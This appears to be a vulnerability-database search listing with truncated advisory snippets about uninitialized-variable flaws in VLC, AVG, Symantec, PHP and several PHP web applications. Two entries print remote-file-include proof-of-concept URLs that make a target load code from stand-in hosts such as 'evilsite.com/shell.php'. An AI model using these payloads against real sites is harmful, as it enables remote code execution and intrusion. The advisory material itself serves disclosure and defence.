CVE-2007-3468

input.c in VideoLAN VLC Media Player before 0.8.6c allows remote attackers to cause a denial of service crash via a crafted WAV file that causes an uninitialized inbresamplers variable to be used...

CVE-2007-3468

input.c in VideoLAN VLC Media Player before 0.8.6c allows remote attackers to cause a denial of service crash via a crafted WAV file that causes an uninitialized inbresamplers variable to be used...

DEBIAN-CVE-2007-3468

input.c in VideoLAN VLC Media Player before 0.8.6c allows remote attackers to cause a denial of service crash via a crafted WAV file that causes an uninitialized inbresamplers variable to be used...

CVE-2007-3468

input.c in VideoLAN VLC Media Player before 0.8.6c allows remote attackers to cause a denial of service crash via a crafted WAV file that causes an uninitialized inbresamplers variable to be used...

VLC 0.8.6b format string vulnerability & integer overflow

iSEC Partners Security Advisory - 2007-001-vlc http://www.isecpartners.com ---------------------------------------------- VLC 0.8.6b format string vulnerability & integer overflow Vendor: VideoLan Vendor URL: http://www.videolan.org Systems Affected: Confirmed on Windows XP, FreeBSD 6.2, MacOS X...

Code injection

Symantec Reporting Server 1.0.197.0, and other versions before 1.0.224.0, as used in Symantec Client Security 3.1 and later, and Symantec AntiVirus Corporate Edition SAV CE 10.1 and later, does not initialize a critical variable, which allows attackers to create arbitrary executable files via...

vlc -- format string vulnerability and integer overflow

isecpartners reports: VLC is vulnerable to a format string attack in the parsing of Vorbis comments in Ogg Vorbis and Ogg Theora files, CDDA data or SAP/SDP service discovery messages. Additionally, there are two errors in the handling of wav files, one a denial of service due to an uninitialized...

PT-2007-4044 · Php · Php

Name of the Vulnerable Software and Affected Versions: PHP affected versions not specified Description: A design error in the make http soap request function in PHP's soap extension causes it to call php rand r with an uninitialized variable, potentially leading to weak encryption of sensitive...

security flaw

The aiosetupring function in Linux kernel does not properly initialize a variable, which allows local users to cause a denial of service crash via an unspecified error path that causes an incorrect free operation...

TextSend <= 1.5 (config/sender.php) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ===================================================================== TextSend include "$ROOTPATH/config.php"; + + Proof Of Concept: + http://target/path/config/sender.php?ROOTPATH=http://evilsite.com/shell.php?...

Paristemi 0.8.3b (buycd.php) Remote File Include Vulnerability

No description provided by source. +------------------------------------------------------------------------------------------- + Paristemi 0.8.3b buycd.php Remote File Include Vulnerability +------------------------------------------------------------------------------------------- + Vendor...

CVE-2006-5938

Grisoft AVG Anti-Virus before 7.1.407 has unknown impact and remote attack vectors involving an uninitialized variable and a crafted CAB file...

AVG Anti-Virus多个远程代码执行漏洞

AVG Anti-Virus是一款功能完备的杀毒软件。 AVG Anti-Virus的文件解析引擎存在多个漏洞，目前已确定的漏洞包括： - 解析.CAB文件时的整数溢出可能导致堆溢出； - 解析.CAB文件时未初始化变量； - 解析.DOC文件时会分隔为0； - 解析.RAR文件时的整数溢出可能导致堆溢出； - 解析.EXE文件时存在整数问题。 如果攻击者创建了特制文件的话，这些漏洞就可能导致远程执行任意代码。 Grisoft AVG Anti-Virus 7.1.407 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

Segue CMS &lt;= 1.5.8 (themesdir) Remote File Include Vulnerability

No description provided by source. +------------------------------------------------------------------------------------------- + Segue CMS = 1.5.8 themesdir Remote File Include Vulnerability +------------------------------------------------------------------------------------------- + Affected...

CVE-2006-3615

Phorum 5.1.14 contains multiple PHP remote file inclusion vulnerabilities when register_globals is enabled. The issue allows remote attackers to execute arbitrary PHP code via vectors related to an uninitialized variable. The affected software is Phorum 5.1.14; impact is partial confidentiality, ...

OaBoard 1.0 Remote File inclusion

OaBoard version 1.x have remote file inclusion . Variables $inc isn't initialized in the include http://host/oaboard/forum.php?inc=http://evilscript/ Hessam-x www.hessamx.net...

Remote file inclusion

PHP remote file inclusion vulnerability in common.php in Intensive Point iUser Ecommerce allows remote attackers to include arbitrary files via a URL in the includepath variable, which is not initialized before being used...

Tolva.txt

Script: Tolva PHP website system Version: 0.1.0 Language: PHP Official Website: http://sourceforge.net/projects/twebs Problem: Remote File Include Discovered by: beford Description: ============ A complete collection of php scripts that work tightly together to create a highly customizable, dynam...

Fedora Core 3 : mysql-3.23.58-16.FC3.1 (2005-304)

Sat Apr 2 2005 Tom Lane 3.23.58-16.FC3.1 - Repair uninitialized variable in security2 patch. - Enable testing on 64-bit arches; continue to exclude s390x which still has issues. - Sat Mar 19 2005 Tom Lane 3.23.58-15.FC3.1 - Backpatch repair for CVE-2005-0709, CVE-2005-0710, CVE-2005-0711...

DEBIAN-CVE-2005-2109

wp-login.php in WordPress 1.5.1.2 and earlier allows remote attackers to change the content of the forgotten password e-mail message via the message variable, which is not initialized before use...